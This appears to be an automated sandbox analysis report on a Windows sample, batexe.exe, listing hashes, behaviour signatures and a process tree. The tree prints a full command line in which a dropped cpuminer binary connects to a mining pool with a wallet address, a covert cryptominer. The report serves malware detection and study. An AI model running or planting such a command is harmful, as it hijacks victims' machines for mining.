Analysis
-
max time kernel
297s -
max time network
294s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
21-02-2024 02:05
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4652 b2e.exe 812 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 812 cpuminer-sse2.exe 812 cpuminer-sse2.exe 812 cpuminer-sse2.exe 812 cpuminer-sse2.exe 812 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/1764-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1764 wrote to memory of 4652 1764 batexe.exe 73 PID 1764 wrote to memory of 4652 1764 batexe.exe 73 PID 1764 wrote to memory of 4652 1764 batexe.exe 73 PID 4652 wrote to memory of 968 4652 b2e.exe 74 PID 4652 wrote to memory of 968 4652 b2e.exe 74 PID 4652 wrote to memory of 968 4652 b2e.exe 74 PID 968 wrote to memory of 812 968 cmd.exe 77 PID 968 wrote to memory of 812 968 cmd.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2844.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2E10.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:812
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
832KB
MD5e1bd95ac3f9c6ce43914de2a53967fee
SHA13e03982c075df051d5a8dd837f42873f30483faf
SHA25645c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550
SHA5122166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00
-
Filesize
999KB
MD52b3b4ff0ca20f74fcc2392825320b902
SHA17fafc6d88b1db59fda0b254fdb905bd6eb02e67e
SHA2564d0e72563bd460b7a4292f0ba3e91c038a9fa48c2f69e81b5e51d889392febcc
SHA512f0c801fcac6885831bdc558140a383b143826a4a07d17bc9d825663335cd930c48cbcf3f866cad55a41f568a884556c065f912ca48aa444c9e03a90280591c6f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
661KB
MD5fa186578d25dc500b8f62f1b2c0e39c5
SHA1a973b049580e61032c275c079cf2c258296f2615
SHA25699ad1ac647007c618b9cd8257a5b87561aa9240570a7976f36f699b7800b4852
SHA5120a97aee3b5a1bedb84d2db400529909eddabfc38ddbdb7c6d495578ef1aa4b59fe2cb4d04685c683e456a457e0c5634dcf970afaf3c8d5c806febce3238ea464
-
Filesize
362KB
MD5e7b7ac73de8b7cd43c1123eb9b7a6358
SHA1e6dbfcb4b8b88ac029a7e0535c51aa8cba64e2ee
SHA256e945ed7289f9d17f7846e945e9f9af399a7cb912547bc331d085b5176ba79823
SHA5128341e735577429387963e3341677db03fa58503107fe3ea0221ed4d88a7c5608cf0143b002e69488072dc6f22dc9c6d0829579eebd18cd29aa665a29d8b51b4d
-
Filesize
496KB
MD543b6e613641eb8590bd609ca1114a9ce
SHA12f0a8256e0adc8977e9f80f67af767bd3beede43
SHA2566342073bb919b07f783941486f120e231591b10b2295210588279a793db19cf6
SHA512f48652104894a1a5f8900ef17420c033d7f2651995bfa67ebc24bf2335d607664cf09442a70bd0a8c2974660693a1230fa96dfec4a6cb9764406311ed21dca69
-
Filesize
599KB
MD55b8821e182c165eb65167a18b408de50
SHA1dd40c47f3e0bd4fb960d96207d80deabebb4a23b
SHA2564418a6c1db6ffe55f5117223b6c211b8b54463c16921bb9a599146ef6de60447
SHA512bc3611b5ff71d20b7d34c3d2000bd1063b203bf08942dc5d3df439532ec1eeb698e3006c67351a7a8545d01cfda9c6ca43519aaf10e216fa4c22bb28ff514cba
-
Filesize
561KB
MD573bbc4a2bc312c2abb551fb33b4b1437
SHA15cb181fd60f95f8af65698fc6b5fc147d45589fb
SHA25601114ddd9c64b854fdcb5dbab63900e1e5721cd9a2a644cb378410db404ef76e
SHA512bc3654695ec860a56d06b2161c9f9ef55fef533a366de8d9040150a5a137dd22b955bbba02373de1886119f374b0e77392a4163d8c70e9a7b92d87bd3195faa6
-
Filesize
369KB
MD5480bee19e7b13cad54c12b5e404e66f9
SHA12d38fb6ff79ce8acd7818f6612c826c627e85c6a
SHA256dfec3e2391cec95d649ceda3e32da444e72a25a54832579695e0f16ce10d8890
SHA51255c0e42ca11535bd9546c44bd7c0b66b1a8194878a758cda62c89ecd4fab4f3c922122daeebe5936eaf98b80605cc38e1e55ea3229e8caee5b35bc9fd777e19b
-
Filesize
369KB
MD591c209343336b9f5125087ba2e636e7e
SHA1f3e061fa495b9e1720d0f3afbba5389551d5ea71
SHA2560817e02e7057bedfe48f814e9270c62eebe74223ddef76b20fb3cdea124c9dda
SHA51236ed4c0dfc44b7549b11cfb13eaf9790a5e6fb380946685232d56050aa35f82946d22f6dd7f07c689199052b7a2b6759126c7e5d798847f9925df4e32a1919eb
-
Filesize
501KB
MD5f03008f91709c2feee35274c69464c4f
SHA13aac569fee73449aba265a1e3ca140afb8c012c4
SHA256441142633df8a76cd8e85f58786370160955a2f5e1e60012b414e9702f4b4d57
SHA51289d9190086300527e6742e166d53baf7c2d5b24e83b0e4a5f2be214872cae9ac080ff277b4e46e49a63f1e867856b937bd7066b92a6d99997f8b3904757762e2
-
Filesize
554KB
MD55dbca8e2c0a6ad98cef6f603cee58b2a
SHA1781021725cbc09c49c44dfa1aa8168207d856cac
SHA2568aada064610346ada65347e1020cac174492ba5c7d8822b27c88355fff7f2793
SHA512351f678409e21819ff9bd2c3eed209fc9b4d1e3e4d13f0256cb1f7f62c2a8aa07d123f3c3c46147788ba74f24e766a5c01f1a7170ff816cbe11f06526743db64
-
Filesize
192KB
MD562069650d62f76a4cdf0e81172d99993
SHA13b20ec5b4a4320ee15b0f7b9715a9ab90f68346e
SHA256779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c
SHA512ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b
-
Filesize
492KB
MD56ff427c07dbf03b71415b8066181106b
SHA1be45fcfeae14f75b10b1d7bdb7c0fc9d7cb69239
SHA256fc0bf772133884a40c10774697bc5138c97e86faf82412f62a7646b38edf7a53
SHA512dc4bf79b16f09a8d4b31770beb23c7f61cae155aeda577bad804396e7de6c7280e00c6e2408bb634163dbf04dfbaf0b86974000ae1001384f5f8f42a5c3a11cf